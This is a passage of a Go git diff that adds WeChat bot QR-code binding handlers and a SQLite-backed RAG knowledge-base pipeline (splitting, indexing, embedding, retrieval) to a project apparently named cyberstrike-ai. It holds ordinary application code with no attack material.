ver = strings.TrimPrefix(strings.TrimSpace(ver), "v") + ver = strings.TrimPrefix(ver, "V") + wc := h.config.Robots.Wechat + return ilink.NewClient(baseURL, wc.BotToken, wc.BotAgent, ilink.BuildClientVersion(ver)) +} + +// HandleWechatQRCode POST /api/robot/wechat/qrcode — 生成绑定二维码 +func (h *WechatRobotHandler) HandleWechatQRCode(c *gin.Context) { + h.mu.Lock() + h.purgeExpiredLogins() + h.mu.Unlock() + + var req struct { + BotType string `json:"bot_type"` + } + _ = c.ShouldBindJSON(&req) + + botType := req.BotType + if botType == "" { + botType = h.config.Robots.Wechat.BotType + } + if botType == "" { + botType = ilink.DefaultBotType + } + baseURL := h.config.Robots.Wechat.BaseURL + if baseURL == "" { + baseURL = ilink.DefaultBaseURL + } + + var localTokens []string + if t := h.config.Robots.Wechat.BotToken; t != "" { + localTokens = []string{t} + } + + client := h.ilinkClient(baseURL) + ctx, cancel := context.WithTimeout(c.Request.Context(), 30*time.Second) + defer cancel() + + qr, err := client.GetBotQRCode(ctx, botType, localTokens) + if err != nil { + h.logger.Warn("获取微信二维码失败", zap.Error(err)) + c.JSON(http.StatusBadGateway, gin.H{"error": "获取二维码失败: " + err.Error()}) + return + } + if qr.QRCode == "" || qr.QRCodeImgContent == "" { + c.JSON(http.StatusBadGateway, gin.H{"error": "微信服务器未返回有效二维码"}) + return + } + + sessionKey := uuid.New().String() + h.mu.Lock() + h.logins[sessionKey] = &wechatLoginSession{ + QRCode: qr.QRCode, + QRCodeImgURL: qr.QRCodeImgContent, + CurrentBaseURL: baseURL, + StartedAt: time.Now(), + } + h.mu.Unlock() + + resp := gin.H{ + "session_key": sessionKey, + "qrcode": qr.QRCode, + "qrcode_open_url": qr.QRCodeImgContent, + "message": "请使用微信扫描二维码并确认绑定", + } + if dataURL, err := ilink.QRCodeDataURL(qr.QRCodeImgContent, 256); err != nil { + h.logger.Warn("生成二维码图片失败", zap.Error(err)) + } else { + resp["qrcode_image_data_url"] = dataURL + } + + c.JSON(http.StatusOK, resp) +} + +// HandleWechatQRCodeStatus GET /api/robot/wechat/qrcode/status — 轮询扫码状态 +func (h *WechatRobotHandler) HandleWechatQRCodeStatus(c *gin.Context) { + sessionKey := c.Query("session_key") + verifyCode := c.Query("verify_code") + if sessionKey == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "缺少 session_key"}) + return + } + + h.mu.Lock() + sess, ok := h.logins[sessionKey] + h.mu.Unlock() + if !ok { + c.JSON(http.StatusNotFound, gin.H{"error": "登录会话不存在或已过期,请重新生成二维码"}) + return + } + if time.Since(sess.StartedAt) > wechatLoginTTL { + h.mu.Lock() + delete(h.logins, sessionKey) + h.mu.Unlock() + c.JSON(http.StatusGone, gin.H{"error": "二维码已过期,请重新生成"}) + return + } + + baseURL := sess.CurrentBaseURL + if baseURL == "" { + baseURL = ilink.DefaultBaseURL + } + vc := verifyCode + if vc == "" { + vc = sess.PendingVerify + } + + client := h.ilinkClient(baseURL) + ctx, cancel := context.WithTimeout(c.Request.Context(), 40*time.Second) + defer cancel() + + st, err := client.GetQRCodeStatus(ctx, sess.QRCode, vc) + if err != nil { + h.logger.Warn("轮询微信二维码状态失败", zap.Error(err)) + c.JSON(http.StatusBadGateway, gin.H{"error": err.Error()}) + return + } + + switch st.Status { + case "wait", "scaned": + c.JSON(http.StatusOK, gin.H{"status": st.Status}) + return + case "need_verifycode": + c.JSON(http.StatusOK, gin.H{ + "status": st.Status, + "message": "请在手机微信查看配对数字,并在下方输入", + }) + return + case "scaned_but_redirect": + if st.RedirectHost != "" { + h.mu.Lock() + if s, ok := h.logins[sessionKey]; ok { + s.CurrentBaseURL = "https://" + st.RedirectHost + } + h.mu.Unlock() + } + c.JSON(http.StatusOK, gin.H{"status": st.Status}) + return + case "binded_redirect": + h.mu.Lock() + delete(h.logins, sessionKey) + h.mu.Unlock() + c.JSON(http.StatusOK, gin.H{ + "status": st.Status, + "already_connected": true, + "message": "该微信已绑定过,无需重复绑定", + }) + return + case "confirmed": + if st.BotToken == "" || st.ILinkBotID == "" { + c.JSON(http.StatusBadGateway, gin.H{"error": "绑定确认成功但缺少 bot_token"}) + return + } + saveBase := st.BaseURL + if saveBase == "" { + saveBase = baseURL + } + wc := h.config.Robots.Wechat + wc.Enabled = true + wc.BotToken = st.BotToken + wc.ILinkBotID = st.ILinkBotID + wc.ILinkUserID = st.ILinkUserID + wc.BaseURL = saveBase + if wc.BotType == "" { + wc.BotType = ilink.DefaultBotType + } + if wc.BotAgent == "" { + wc.BotAgent = ilink.DefaultBotAgent + } + if h.configSaver != nil { + if err := h.configSaver.ApplyWechatRobotBinding(wc); err != nil { + h.logger.Warn("保存微信机器人配置失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()}) + return + } + } else { + h.config.Robots.Wechat = wc + } + h.mu.Lock() + delete(h.logins, sessionKey) + h.mu.Unlock() + c.JSON(http.StatusOK, gin.H{ + "status": "confirmed", + "message": "绑定成功,微信机器人已启用", + "ilink_bot_id": st.ILinkBotID, + "ilink_user_id": st.ILinkUserID, + }) + return + default: + c.JSON(http.StatusOK, gin.H{"status": st.Status}) + } +} + +// HandleWechatVerifyCode POST /api/robot/wechat/qrcode/verify — 提交手机配对数字 +func (h *WechatRobotHandler) HandleWechatVerifyCode(c *gin.Context) { + var req struct { + SessionKey string `json:"session_key"` + VerifyCode string `json:"verify_code"` + } + if err := c.ShouldBindJSON(&req); err != nil || req.SessionKey == "" || req.VerifyCode == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "需要 session_key 与 verify_code"}) + return + } + h.mu.Lock() + sess, ok := h.logins[req.SessionKey] + if ok { + sess.PendingVerify = req.VerifyCode + } + h.mu.Unlock() + if !ok { + c.JSON(http.StatusNotFound, gin.H{"error": "登录会话不存在或已过期"}) + return + } + c.JSON(http.StatusOK, gin.H{"message": "已提交配对码,请继续等待绑定"}) +} + +// HandleWechatStatus GET /api/robot/wechat/status — 当前绑定状态(供前端展示) +func (h *WechatRobotHandler) HandleWechatStatus(c *gin.Context) { + wc := h.config.Robots.Wechat + bound := wc.BotToken != "" && wc.ILinkBotID != "" + c.JSON(http.StatusOK, gin.H{ + "enabled": wc.Enabled, + "bound": bound, + "ilink_bot_id": wc.ILinkBotID, + "ilink_user_id": wc.ILinkUserID, + "base_url": wc.BaseURL, + }) +} diff --git a/internal/knowledge/chunk_eino.go b/internal/knowledge/chunk_eino.go new file mode 100644 index 00000000..6592f350 --- /dev/null +++ b/internal/knowledge/chunk_eino.go @@ -0,0 +1,67 @@ +package knowledge + +import ( + "context" + "fmt" + "strings" + + "github.com/cloudwego/eino-ext/components/document/transformer/splitter/markdown" + "github.com/cloudwego/eino-ext/components/document/transformer/splitter/recursive" + "github.com/cloudwego/eino/components/document" + "github.com/pkoukk/tiktoken-go" +) + +func tokenizerLenFunc(embeddingModel string) func(string) int { + fallback := func(s string) int { + r := []rune(s) + if len(r) == 0 { + return 0 + } + return (len(r) + 3) / 4 + } + m := strings.TrimSpace(embeddingModel) + if m == "" { + return fallback + } + tok, err := tiktoken.EncodingForModel(m) + if err != nil { + return fallback + } + return func(s string) int { + return len(tok.Encode(s, nil, nil)) + } +} + +// newKnowledgeSplitter builds an Eino recursive text splitter. LenFunc uses tiktoken for +// embeddingModel when available, else rune/4 approximation. +func newKnowledgeSplitter(chunkSize, overlap int, embeddingModel string) (document.Transformer, error) { + if chunkSize <= 0 { + return nil, fmt.Errorf("chunk size must be positive") + } + if overlap < 0 { + overlap = 0 + } + return recursive.NewSplitter(context.Background(), &recursive.Config{ + ChunkSize: chunkSize, + OverlapSize: overlap, + LenFunc: tokenizerLenFunc(embeddingModel), + Separators: []string{ + "\n\n", "\n## ", "\n### ", "\n#### ", "\n", + "。", "!", "?", ". ", "? ", "! ", + " ", + }, + }) +} + +// newMarkdownHeaderSplitter Eino-ext Markdown 按标题切分(#~####),适合技术/Markdown 知识库。 +func newMarkdownHeaderSplitter(ctx context.Context) (document.Transformer, error) { + return markdown.NewHeaderSplitter(ctx, &markdown.HeaderConfig{ + Headers: map[string]string{ + "#": "h1", + "##": "h2", + "###": "h3", + "####": "h4", + }, + TrimHeaders: false, + }) +} diff --git a/internal/knowledge/eino_meta.go b/internal/knowledge/eino_meta.go new file mode 100644 index 00000000..0ee7c41b --- /dev/null +++ b/internal/knowledge/eino_meta.go @@ -0,0 +1,129 @@ +package knowledge + +import ( + "fmt" + "strings" +) + +// Document metadata keys for Eino schema.Document flowing through the RAG pipeline. +const ( + metaKBCategory = "kb_category" + metaKBTitle = "kb_title" + metaKBItemID = "kb_item_id" + metaKBChunkIndex = "kb_chunk_index" + metaSimilarity = "similarity" +) + +// DSL keys for [VectorEinoRetriever.Retrieve] via [retriever.WithDSLInfo]. +const ( + DSLRiskType = "risk_type" + DSLSimilarityThreshold = "similarity_threshold" + DSLSubIndexFilter = "sub_index_filter" +) + +// FormatEmbeddingInput matches the historical indexing format so existing embeddings +// stay comparable if users skip reindex; new indexes use the same string shape. +func FormatEmbeddingInput(category, title, chunkText string) string { + return fmt.Sprintf("[风险类型:%s] [标题:%s]\n%s", category, title, chunkText) +} + +// FormatQueryEmbeddingText builds the string embedded at query time so it matches +// [FormatEmbeddingInput] for the same risk category (title left empty for queries). +func FormatQueryEmbeddingText(riskType, query string) string { + q := strings.TrimSpace(query) + rt := strings.TrimSpace(riskType) + if rt != "" { + return FormatEmbeddingInput(rt, "", q) + } + return q +} + +// MetaLookupString returns metadata string value or "" if absent. +func MetaLookupString(md map[string]any, key string) string { + if md == nil { + return "" + } + v, ok := md[key] + if !ok || v == nil { + return "" + } + switch t := v.(type) { + case string: + return t + default: + return strings.TrimSpace(fmt.Sprint(t)) + } +} + +// MetaStringOK returns trimmed non-empty string and true if present and non-empty. +func MetaStringOK(md map[string]any, key string) (string, bool) { + s := strings.TrimSpace(MetaLookupString(md, key)) + if s == "" { + return "", false + } + return s, true +} + +// RequireMetaString requires a non-empty string metadata field. +func RequireMetaString(md map[string]any, key string) (string, error) { + s, ok := MetaStringOK(md, key) + if !ok { + return "", fmt.Errorf("missing or empty metadata %q", key) + } + return s, nil +} + +// RequireMetaInt requires an integer metadata field. +func RequireMetaInt(md map[string]any, key string) (int, error) { + if md == nil { + return 0, fmt.Errorf("missing metadata key %q", key) + } + v, ok := md[key] + if !ok { + return 0, fmt.Errorf("missing metadata key %q", key) + } + switch t := v.(type) { + case int: + return t, nil + case int32: + return int(t), nil + case int64: + return int(t), nil + case float64: + return int(t), nil + default: + return 0, fmt.Errorf("metadata %q: unsupported type %T", key, v) + } +} + +// DSLNumeric coerces DSL map values (e.g. from JSON) to float64. +func DSLNumeric(v any) (float64, bool) { + switch t := v.(type) { + case float64: + return t, true + case float32: + return float64(t), true + case int: + return float64(t), true + case int64: + return float64(t), true + case uint32: + return float64(t), true + case uint64: + return float64(t), true + default: + return 0, false + } +} + +// MetaFloat64OK reads a float metadata value. +func MetaFloat64OK(md map[string]any, key string) (float64, bool) { + if md == nil { + return 0, false + } + v, ok := md[key] + if !ok { + return 0, false + } + return DSLNumeric(v) +} diff --git a/internal/knowledge/eino_meta_test.go b/internal/knowledge/eino_meta_test.go new file mode 100644 index 00000000..ba3f60da --- /dev/null +++ b/internal/knowledge/eino_meta_test.go @@ -0,0 +1,14 @@ +package knowledge + +import "testing" + +func TestFormatQueryEmbeddingText_AlignsWithIndexPrefix(t *testing.T) { + q := FormatQueryEmbeddingText("XSS", "payload") + want := FormatEmbeddingInput("XSS", "", "payload") + if q != want { + t.Fatalf("query embed text mismatch:\n got: %q\nwant: %q", q, want) + } + if FormatQueryEmbeddingText("", "hello") != "hello" { + t.Fatalf("expected bare query without risk type") + } +} diff --git a/internal/knowledge/eino_retrieve_chain.go b/internal/knowledge/eino_retrieve_chain.go new file mode 100644 index 00000000..2d1b72eb --- /dev/null +++ b/internal/knowledge/eino_retrieve_chain.go @@ -0,0 +1,25 @@ +package knowledge + +import ( + "context" + "fmt" + + "github.com/cloudwego/eino/compose" + "github.com/cloudwego/eino/schema" +) + +// BuildKnowledgeRetrieveChain 编译「查询字符串 → 文档列表」的 Eino Chain,底层为 SQLite 向量检索([VectorEinoRetriever])。 +// 去重、上下文预算截断与最终 Top-K 均在 [VectorEinoRetriever.Retrieve] 内完成,与 HTTP/MCP 检索路径一致。 +func BuildKnowledgeRetrieveChain(ctx context.Context, r *Retriever) (compose.Runnable[string, []*schema.Document], error) { + if r == nil { + return nil, fmt.Errorf("retriever is nil") + } + ch := compose.NewChain[string, []*schema.Document]() + ch.AppendRetriever(r.AsEinoRetriever()) + return ch.Compile(ctx) +} + +// CompileRetrieveChain 等价于 [BuildKnowledgeRetrieveChain](ctx, r)。 +func (r *Retriever) CompileRetrieveChain(ctx context.Context) (compose.Runnable[string, []*schema.Document], error) { + return BuildKnowledgeRetrieveChain(ctx, r) +} diff --git a/internal/knowledge/eino_retrieve_chain_test.go b/internal/knowledge/eino_retrieve_chain_test.go new file mode 100644 index 00000000..c74a6900 --- /dev/null +++ b/internal/knowledge/eino_retrieve_chain_test.go @@ -0,0 +1,23 @@ +package knowledge + +import ( + "context" + "testing" + + "go.uber.org/zap" +) + +func TestBuildKnowledgeRetrieveChain_Compile(t *testing.T) { + r := NewRetriever(nil, nil, &RetrievalConfig{TopK: 3, SimilarityThreshold: 0.5}, zap.NewNop()) + _, err := BuildKnowledgeRetrieveChain(context.Background(), r) + if err != nil { + t.Fatal(err) + } +} + +func TestBuildKnowledgeRetrieveChain_NilRetriever(t *testing.T) { + _, err := BuildKnowledgeRetrieveChain(context.Background(), nil) + if err == nil { + t.Fatal("expected error for nil retriever") + } +} diff --git a/internal/knowledge/eino_retriever_adapter.go b/internal/knowledge/eino_retriever_adapter.go new file mode 100644 index 00000000..f5635121 --- /dev/null +++ b/internal/knowledge/eino_retriever_adapter.go @@ -0,0 +1,202 @@ +package knowledge + +import ( + "context" + "fmt" + "strings" + + "cyberstrike-ai/internal/config" + + "github.com/cloudwego/eino/callbacks" + "github.com/cloudwego/eino/components" + "github.com/cloudwego/eino/components/retriever" + "github.com/cloudwego/eino/schema" + "go.uber.org/zap" +) + +// VectorEinoRetriever implements [retriever.Retriever] on top of SQLite-stored embeddings + cosine similarity. +// +// Options: +// - [retriever.WithTopK] +// - [retriever.WithDSLInfo] with [DSLRiskType] (string), [DSLSimilarityThreshold] (float, cosine 0–1), [DSLSubIndexFilter] (string) +// +// Document scores are cosine similarity; [retriever.WithScoreThreshold] is not mapped to a different metric. +// +// After vector search: optional [DocumentReranker] (see [Retriever.SetDocumentReranker]), then +// [ApplyPostRetrieve] (normalized-text dedupe, context budget, final Top-K) using [config.PostRetrieveConfig]. +type VectorEinoRetriever struct { + inner *Retriever +} + +// NewVectorEinoRetriever wraps r for Eino compose / tooling. +func NewVectorEinoRetriever(r *Retriever) *VectorEinoRetriever { + if r == nil { + return nil + } + return &VectorEinoRetriever{inner: r} +} + +// GetType identifies this retriever for Eino callbacks. +func (h *VectorEinoRetriever) GetType() string { + return "SQLiteVectorKnowledgeRetriever" +} + +// Retrieve runs vector search and returns [schema.Document] rows. +func (h *VectorEinoRetriever) Retrieve(ctx context.Context, query string, opts ...retriever.Option) (out []*schema.Document, err error) { + if h == nil || h.inner == nil { + return nil, fmt.Errorf("VectorEinoRetriever: nil retriever") + } + q := strings.TrimSpace(query) + if q == "" { + return nil, fmt.Errorf("查询不能为空") + } + + ro := retriever.GetCommonOptions(nil, opts...) + cfg := h.inner.config + + req := &SearchRequest{Query: q} + + if ro.TopK != nil && *ro.TopK > 0 { + req.TopK = *ro.TopK + } else if cfg != nil && cfg.TopK > 0 { + req.TopK = cfg.TopK + } else { + req.TopK = 5 + } + + req.Threshold = 0 + if ro.DSLInfo != nil { + if rt, ok := ro.DSLInfo[DSLRiskType].(string); ok { + req.RiskType = strings.TrimSpace(rt) + } + if v, ok := ro.DSLInfo[DSLSimilarityThreshold]; ok { + if f, ok2 := DSLNumeric(v); ok2 && f > 0 { + req.Threshold = f + } + } + if sf, ok := ro.DSLInfo[DSLSubIndexFilter].(string); ok { + req.SubIndexFilter = strings.TrimSpace(sf) + } + } + if req.SubIndexFilter == "" && cfg != nil && strings.TrimSpace(cfg.SubIndexFilter) != "" { + req.SubIndexFilter = strings.TrimSpace(cfg.SubIndexFilter) + } + if req.Threshold <= 0 && cfg != nil && cfg.SimilarityThreshold > 0 { + req.Threshold = cfg.SimilarityThreshold + } + if req.Threshold <= 0 { + req.Threshold = 0.7 + } + + finalTopK := req.TopK + var postPO *config.PostRetrieveConfig + if cfg != nil { + postPO = &cfg.PostRetrieve + } + fetchK := EffectivePrefetchTopK(finalTopK, postPO) + searchReq := *req + searchReq.TopK = fetchK + + ctx = callbacks.EnsureRunInfo(ctx, h.GetType(), components.ComponentOfRetriever) + th := req.Threshold + st := &th + ctx = callbacks.OnStart(ctx, &retriever.CallbackInput{ + Query: q, + TopK: finalTopK, + ScoreThreshold: st, + Extra: ro.DSLInfo, + }) + defer func() { + if err != nil { + _ = callbacks.OnError(ctx, err) + return + } + _ = callbacks.OnEnd(ctx, &retriever.CallbackOutput{Docs: out}) + }() + + results, err := h.inner.vectorSearch(ctx, &searchReq) + if err != nil { + return nil, err + } + out = retrievalResultsToDocuments(results) + + if rr := h.inner.documentReranker(); rr != nil && len(out) > 1 { + reranked, rerr := rr.Rerank(ctx, q, out) + if rerr != nil { + if h.inner.logger != nil { + h.inner.logger.Warn("知识检索重排失败,已使用向量序", zap.Error(rerr)) + } + } else if len(reranked) > 0 { + out = reranked + } + } + + tokenModel := "" + if h.inner.embedder != nil { + tokenModel = h.inner.embedder.EmbeddingModelName() + } + out, err = ApplyPostRetrieve(out, postPO, tokenModel, finalTopK) + if err != nil { + return nil, err + } + return out, nil +} + +func retrievalResultsToDocuments(results []*RetrievalResult) []*schema.Document { + out := make([]*schema.Document, 0, len(results)) + for _, res := range results { + if res == nil || res.Chunk == nil || res.Item == nil { + continue + } + d := &schema.Document{ + ID: res.Chunk.ID, + Content: res.Chunk.ChunkText, + MetaData: map[string]any{ + metaKBItemID: res.Item.ID, + metaKBCategory: res.Item.Category, + metaKBTitle: res.Item.Title, + metaKBChunkIndex: res.Chunk.ChunkIndex, + metaSimilarity: res.Similarity, + }, + } + d.WithScore(res.Score) + out = append(out, d) + } + return out +} + +func documentsToRetrievalResults(docs []*schema.Document) ([]*RetrievalResult, error) { + out := make([]*RetrievalResult, 0, len(docs)) + for i, d := range docs { + if d == nil { + continue + } + itemID, err := RequireMetaString(d.MetaData, metaKBItemID) + if err != nil { + return nil, fmt.Errorf("document %d: %w", i, err) + } + cat := MetaLookupString(d.MetaData, metaKBCategory) + title := MetaLookupString(d.MetaData, metaKBTitle) + chunkIdx, err := RequireMetaInt(d.MetaData, metaKBChunkIndex) + if err != nil { + return nil, fmt.Errorf("document %d: %w", i, err) + } + sim, _ := MetaFloat64OK(d.MetaData, metaSimilarity) + item := &KnowledgeItem{ID: itemID, Category: cat, Title: title} + chunk := &KnowledgeChunk{ + ID: d.ID, + ItemID: itemID, + ChunkIndex: chunkIdx, + ChunkText: d.Content, + } + out = append(out, &RetrievalResult{ + Chunk: chunk, + Item: item, + Similarity: sim, + Score: d.Score(), + }) + } + return out, nil +} + +var _ retriever.Retriever = (*VectorEinoRetriever)(nil) diff --git a/internal/knowledge/eino_sqlite_indexer.go b/internal/knowledge/eino_sqlite_indexer.go new file mode 100644 index 00000000..a0bbdcdc --- /dev/null +++ b/internal/knowledge/eino_sqlite_indexer.go @@ -0,0 +1,142 @@ +package knowledge + +import ( + "context" + "database/sql" + "encoding/json" + "fmt" + "strings" + + "github.com/cloudwego/eino/callbacks" + "github.com/cloudwego/eino/components" + "github.com/cloudwego/eino/components/indexer" + "github.com/cloudwego/eino/schema" + "github.com/google/uuid" +) + +// SQLiteIndexer implements [indexer.Indexer] against knowledge_embeddings + existing schema. +type SQLiteIndexer struct { + db *sql.DB + batchSize int + embeddingModel string +} + +// NewSQLiteIndexer returns an indexer that writes chunk rows for one knowledge item per Store call. +// batchSize is the embedding batch size; if <= 0, default 64 is used. +// embeddingModel is persisted per row for retrieval-time consistency checks (may be empty). +func NewSQLiteIndexer(db *sql.DB, batchSize int, embeddingModel string) *SQLiteIndexer { + return &SQLiteIndexer{db: db, batchSize: batchSize, embeddingModel: strings.TrimSpace(embeddingModel)} +} + +// GetType implements eino callback run info. +func (s *SQLiteIndexer) GetType() string { + return "SQLiteKnowledgeIndexer" +} + +// Store embeds documents and inserts rows. Each doc must carry MetaData: +// kb_item_id, kb_category, kb_title, kb_chunk_index (int). Content is chunk text only. +func (s *SQLiteIndexer) Store(ctx context.Context, docs []*schema.Document, opts ...indexer.Option) (ids []string, err error) { + options := indexer.GetCommonOptions(nil, opts...) + if options.Embedding == nil { + return nil, fmt.Errorf("sqlite indexer: embedding is required") + } + if len(docs) == 0 { + return nil, nil + } + + ctx = callbacks.EnsureRunInfo(ctx, s.GetType(), components.ComponentOfIndexer) + ctx = callbacks.OnStart(ctx, &indexer.CallbackInput{Docs: docs}) + defer func() { + if err != nil { + _ = callbacks.OnError(ctx, err) + return + } + _ = callbacks.OnEnd(ctx, &indexer.CallbackOutput{IDs: ids}) + }() + + subIdxStr := strings.Join(options.SubIndexes, ",") + + texts := make([]string, len(docs)) + for i, d := range docs { + if d == nil { + return nil, fmt.Errorf("sqlite indexer: nil document at %d", i) + } + cat := MetaLookupString(d.MetaData, metaKBCategory) + title := MetaLookupString(d.MetaData, metaKBTitle) + texts[i] = FormatEmbeddingInput(cat, title, d.Content) + } + + bs := s.batchSize + if bs <= 0 { + bs = 64 + } + + var allVecs [][]float64 + for start := 0; start < len(texts); start += bs { + end := start + bs + if end > len(texts) { + end = len(texts) + } + batch := texts[start:end] + vecs, embedErr := options.Embedding.EmbedStrings(ctx, batch) + if embedErr != nil { + return nil, fmt.Errorf("sqlite indexer: embed batch %d-%d: %w", start, end, embedErr) + } + if len(vecs) != len(batch) { + return nil, fmt.Errorf("sqlite indexer: embed count mismatch: got %d want %d", len(vecs), len(batch)) + } + allVecs = append(allVecs, vecs...) + } + + embedDim := 0 + if len(allVecs) > 0 { + embedDim = len(allVecs[0]) + } + + tx, err := s.db.BeginTx(ctx, nil) + if err != nil { + return nil, fmt.Errorf("sqlite indexer: begin tx: %w", err) + } + defer tx.Rollback() + + ids = make([]string, 0, len(docs)) + for i, d := range docs { + chunkID := uuid.New().String() + itemID, metaErr := RequireMetaString(d.MetaData, metaKBItemID) + if metaErr != nil { + return nil, fmt.Errorf("sqlite indexer: doc %d: %w", i, metaErr) + } + chunkIdx, metaErr := RequireMetaInt(d.MetaData, metaKBChunkIndex) + if metaErr != nil { + return nil, fmt.Errorf("sqlite indexer: doc %d: %w", i, metaErr) + } + vec := allVecs[i] + if embedDim > 0 && len(vec) != embedDim { + return nil, fmt.Errorf("sqlite indexer: inconsistent embedding dim at doc %d: got %d want %d", i, len(vec), embedDim) + } + vec32 := make([]float32, len(vec)) + for j, v := range vec { + vec32[j] = float32(v) + } + embeddingJSON, jsonErr := json.Marshal(vec32) + if jsonErr != nil { + return nil, fmt.Errorf("sqlite indexer: marshal embedding: %w", jsonErr) + } + _, err = tx.ExecContext(ctx, + `INSERT INTO knowledge_embeddings (id, item_id, chunk_index, chunk_text, embedding, sub_indexes, embedding_model, embedding_dim, created_at) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, datetime('now'))`, + chunkID, itemID, chunkIdx, d.Content, string(embeddingJSON), subIdxStr, s.embeddingModel, embedDim, + ) + if err != nil { + return nil, fmt.Errorf("sqlite indexer: insert chunk %d: %w", i, err) + } + ids = append(ids, chunkID) + } + + if err := tx.Commit(); err != nil { + return nil, fmt.Errorf("sqlite indexer: commit: %w", err) + } + return ids, nil +} + +var _ indexer.Indexer = (*SQLiteIndexer)(nil) diff --git a/internal/knowledge/embedder.go b/internal/knowledge/embedder.go new file mode 100644 index 00000000..d9ce8afa --- /dev/null +++ b/internal/knowledge/embedder.go @@ -0,0 +1,251 @@ +package knowledge + +import ( + "context" + "fmt" + "net/http" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/config" + + einoembedopenai "github.com/cloudwego/eino-ext/components/embedding/openai" + "github.com/cloudwego/eino/components/embedding" + "go.uber.org/zap" + "golang.org/x/time/rate" +) + +// Embedder 使用 CloudWeGo Eino 的 OpenAI Embedding 组件,并保留速率限制与重试。 +type Embedder struct { + eino embedding.Embedder + config *config.KnowledgeConfig + logger *zap.Logger + + rateLimiter *rate.Limiter + rateLimitDelay time.Duration + maxRetries int + retryDelay time.Duration + mu sync.Mutex +} + +// NewEmbedder 基于 Eino eino-ext OpenAI Embedder;openAIConfig 用于在知识库未单独配置 key 时回退 API Key。 +func NewEmbedder(ctx context.Context, cfg *config.KnowledgeConfig, openAIConfig *config.OpenAIConfig, logger *zap.Logger) (*Embedder, error) { + if cfg == nil { + return nil, fmt.Errorf("knowledge config is nil") + } + + var rateLimiter *rate.Limiter + var rateLimitDelay time.Duration + if cfg.Indexing.MaxRPM > 0 { + rpm := cfg.Indexing.MaxRPM + rateLimiter = rate.NewLimiter(rate.Every(time.Minute/time.Duration(rpm)), rpm) + if logger != nil { + logger.Info("知识库索引速率限制已启用", zap.Int("maxRPM", rpm)) + } + } else if cfg.Indexing.RateLimitDelayMs > 0 { + rateLimitDelay = time.Duration(cfg.Indexing.RateLimitDelayMs) * time.Millisecond + if logger != nil { + logger.Info("知识库索引固定延迟已启用", zap.Duration("delay", rateLimitDelay)) + } + } + + maxRetries := 3 + retryDelay := 1000 * time.Millisecond + if cfg.Indexing.MaxRetries > 0 { + maxRetries = cfg.Indexing.MaxRetries + } + if cfg.Indexing.RetryDelayMs > 0 { + retryDelay = time.Duration(cfg.Indexing.RetryDelayMs) * time.Millisecond + } + + model := strings.TrimSpace(cfg.Embedding.Model) + if model == "" { + model = "text-embedding-3-small" + } + + baseURL := strings.TrimSpace(cfg.Embedding.BaseURL) + baseURL = strings.TrimSuffix(baseURL, "/") + if baseURL == "" { + baseURL = "https://api.openai.com/v1" + } + + apiKey := strings.TrimSpace(cfg.Embedding.APIKey) + if apiKey == "" && openAIConfig != nil { + apiKey = strings.TrimSpace(openAIConfig.APIKey) + } + if apiKey == "" { + return nil, fmt.Errorf("embedding API key 未配置") + } + + timeout := 120 * time.Second + if cfg.Indexing.RequestTimeoutSeconds > 0 { + timeout = time.Duration(cfg.Indexing.RequestTimeoutSeconds) * time.Second + } + httpClient := &http.Client{Timeout: timeout} + + inner, err := einoembedopenai.NewEmbedder(ctx, &einoembedopenai.EmbeddingConfig{ + APIKey: apiKey, + BaseURL: baseURL, + ByAzure: false, + Model: model, + HTTPClient: httpClient, + }) + if err != nil { + return nil, fmt.Errorf("eino OpenAI embedder: %w", err) + } + + return &Embedder{ + eino: inner, + config: cfg, + logger: logger, + rateLimiter: rateLimiter, + rateLimitDelay: rateLimitDelay, + maxRetries: maxRetries, + retryDelay: retryDelay, + }, nil +} + +// EmbeddingModelName 返回配置的嵌入模型名(用于 tiktoken 分块与向量行元数据)。 +func (e *Embedder) EmbeddingModelName() string { + if e == nil || e.config == nil { + return "" + } + s := strings.TrimSpace(e.config.Embedding.Model) + if s != "" { + return s + } + return "text-embedding-3-small" +} + +func (e *Embedder) waitRateLimiter() { + e.mu.Lock() + defer e.mu.Unlock() + + if e.rateLimiter != nil { + ctx := context.Background() + if err := e.rateLimiter.Wait(ctx); err != nil && e.logger != nil { + e.logger.Warn("速率限制器等待失败", zap.Error(err)) + } + } + if e.rateLimitDelay > 0 { + time.Sleep(e.rateLimitDelay) + } +} + +// EmbedText 单条嵌入(float32,与历史存储格式一致)。 +func (e *Embedder) EmbedText(ctx context.Context, text string) ([]float32, error) { + vecs, err := e.EmbedStrings(ctx, []string{text}) + if err != nil { + return nil, err + } + if len(vecs) != 1 { + return nil, fmt.Errorf("unexpected embedding count: %d", len(vecs)) + } + return vecs[0], nil +} + +// EmbedStrings 批量嵌入,带重试;实现 [embedding.Embedder],可供 Eino Indexer 使用。 +func (e *Embedder) EmbedStrings(ctx context.Context, texts []string, opts ...embedding.Option) ([][]float32, error) { + if e == nil || e.eino == nil { + return nil, fmt.Errorf("embedder not initialized") + } + if len(texts) == 0 { + return nil, nil + } + + var lastErr error + for attempt := 0; attempt < e.maxRetries; attempt++ { + if attempt > 0 { + wait := e.retryDelay * time.Duration(attempt) + if e.logger != nil { + e.logger.Debug("嵌入重试前等待", zap.Int("attempt", attempt+1), zap.Duration("wait", wait)) + } + select { + case <-ctx.Done(): + return nil, ctx.Err() + case <-time.After(wait): + } + } else { + e.waitRateLimiter() + } + + raw, err := e.eino.EmbedStrings(ctx, texts, opts...) + if err == nil { + out := make([][]float32, len(raw)) + for i, row := range raw { + out[i] = make([]float32, len(row)) + for j, v := range row { + out[i][j] = float32(v) + } + } + return out, nil + } + lastErr = err + if !e.isRetryableError(err) { + return nil, err + } + if e.logger != nil { + e.logger.Debug("嵌入失败,将重试", zap.Int("attempt", attempt+1), zap.Error(err)) + } + } + return nil, fmt.Errorf("达到最大重试次数 (%d): %v", e.maxRetries, lastErr) +} + +// EmbedTexts 批量 float32 嵌入(兼容旧调用;单次请求批量以减小延迟)。 +func (e *Embedder) EmbedTexts(ctx context.Context, texts []string) ([][]float32, error) { + return e.EmbedStrings(ctx, texts) +} + +func (e *Embedder) isRetryableError(err error) bool { + if err == nil { + return false + } + errStr := err.Error() + if strings.Contains(errStr, "429") || strings.Contains(errStr, "rate limit") { + return true + } + if strings.Contains(errStr, "500") || strings.Contains(errStr, "502") || + strings.Contains(errStr, "503") || strings.Contains(errStr, "504") { + return true + } + if 